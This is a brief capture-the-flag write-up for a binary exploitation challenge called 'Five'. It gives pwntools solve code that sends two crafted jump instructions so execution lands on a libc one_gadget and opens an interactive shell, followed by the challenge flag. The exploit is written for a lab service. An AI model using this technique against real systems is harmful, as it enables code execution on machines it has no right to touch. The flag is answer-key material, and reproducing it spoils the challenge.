Five

Challenge

Two staged short jumps are sent so execution reaches a one_gadget inside libc.

Solution

Key solve code:

main = elf.sym["main"]
p = remote("localhost", 1337)

page_offset = -0x1c3000
og = 0x4497f

s = b"\xe9" + p32(-0x10000 + (main & 0xfff) - 5, signed=True)
p.send(s)

s2 = b"\xe9" + p32(page_offset + og - 5, signed=True)
p.send(s2)
p.interactive()

Flag

gigem{if_you_used_syscall_read_pls_tell_nhwn_how_you_did_it}